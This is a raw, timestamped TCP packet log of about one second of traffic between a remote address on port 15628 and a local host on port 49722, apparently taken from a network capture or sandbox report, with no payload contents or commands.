Jul 20, 2024 16:31:09.800421953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.804128885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.828946114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.829286098 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.842048883 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.842211962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.876698017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.876786947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.889225006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.889334917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.894639015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.894752979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.899838924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.899913073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.905464888 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.905631065 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.911633968 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.911705971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.920665026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.920722008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.928698063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.928766966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.933777094 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.933835983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.938751936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.938807964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.943837881 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.943902969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.948775053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.948852062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.954643965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.954787016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.959633112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.959686041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.965363026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.965424061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.970354080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.970448017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.975297928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.975373983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.980395079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.980469942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.985903025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.985965014 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.991251945 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.991329908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:09.999473095 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:09.999531031 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.004523039 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.004611015 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.009464025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.009547949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.014456034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.014523983 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.019427061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.019483089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.024547100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.024852991 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.029716015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.033507109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.038496017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.041501999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.046845913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.049500942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.054591894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.057496071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.063173056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.065501928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.073319912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.073483944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.078586102 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.081499100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.086827993 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.089492083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.094450951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.097497940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.102576971 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.105499029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.126128912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.126209974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.133944035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.137510061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.142582893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.145545006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.151503086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.160121918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.173413038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.173507929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.181874990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.185528040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.193041086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.193540096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.198378086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.198519945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.203450918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.205481052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.210485935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.212390900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.217273951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.217345953 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.224169970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.224257946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.229167938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.229269028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.234143972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.234278917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.239716053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.239892960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.244805098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.244904041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.249809980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.249870062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.254987001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.255081892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.260073900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.260149002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.265052080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.265110016 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.270000935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.270056009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.274936914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.274996042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.280137062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.280236959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.285134077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.285198927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.290174007 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.290266037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.295181990 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.295238018 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.300118923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.300177097 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.305100918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.305172920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.310147047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.310221910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.315156937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.315231085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.320343018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.320435047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.325387001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.325440884 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.330322981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.330388069 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.335318089 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.335454941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.340317011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.340369940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.345319033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.345379114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.350229025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.350351095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.355196953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.355264902 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.360147953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.360214949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.365147114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.365204096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.370085955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.370151997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.375049114 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.375112057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.380048037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.380121946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.385351896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.385423899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.390321970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.390382051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.395302057 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.395358086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.400337934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.400429964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.405332088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.405397892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.410670042 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.410733938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.415786028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.415851116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.420753956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.420828104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.425800085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.425860882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.430762053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.430840969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.435868025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.435937881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.441091061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.441159964 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.446146011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.446233034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.451335907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.451404095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.456351995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.456418037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.461507082 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.461621046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.466722965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.466806889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.471833944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.471900940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.477358103 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.477433920 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.482364893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.482443094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.487656116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.487720013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.492901087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.492974997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.497993946 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.498060942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.503047943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.503130913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.508246899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.508320093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.513508081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.513921022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.518805981 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.518889904 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.523999929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.524080992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.529021978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.529115915 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.534198046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.534315109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.539501905 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.539576054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.544440985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.544532061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.549371004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.549448013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.554575920 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.554646969 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.560051918 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.560195923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.567236900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.567313910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.576987028 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.577063084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.584363937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.584438086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.589384079 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.589462996 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.594280005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.594352961 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.599217892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.599280119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.604111910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.604182005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.609033108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.609119892 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.613961935 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.614022017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.618920088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.618983984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.623843908 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.623924017 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.629098892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.629190922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.634258986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.634335041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.639162064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.639257908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.644124985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.644196033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.649122000 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.649218082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.654208899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.654282093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.659197092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.659275055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.664117098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.664190054 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.669061899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.669145107 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.674021959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.674081087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.679013014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.679076910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.683917046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.683981895 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.688946962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.689100981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.696832895 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.696913958 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.701934099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.702022076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.707160950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.707252026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.712368011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.712431908 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.718353033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.718487978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.723398924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.723462105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.728254080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.728317976 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.733239889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.733313084 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.738240957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.738303900 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.743282080 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.743336916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.748456001 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.748526096 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.753350019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.753433943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.758359909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.758436918 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.763741970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.763807058 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.769474983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.769687891 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.774589062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.774655104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.779637098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.779707909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.784617901 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.784754038 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.789824963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.789890051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.794837952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.794907093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.799786091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.799869061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:10.804845095 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:10.804919004 CEST	49722	15628	192.168.2.6	154.204.0.5
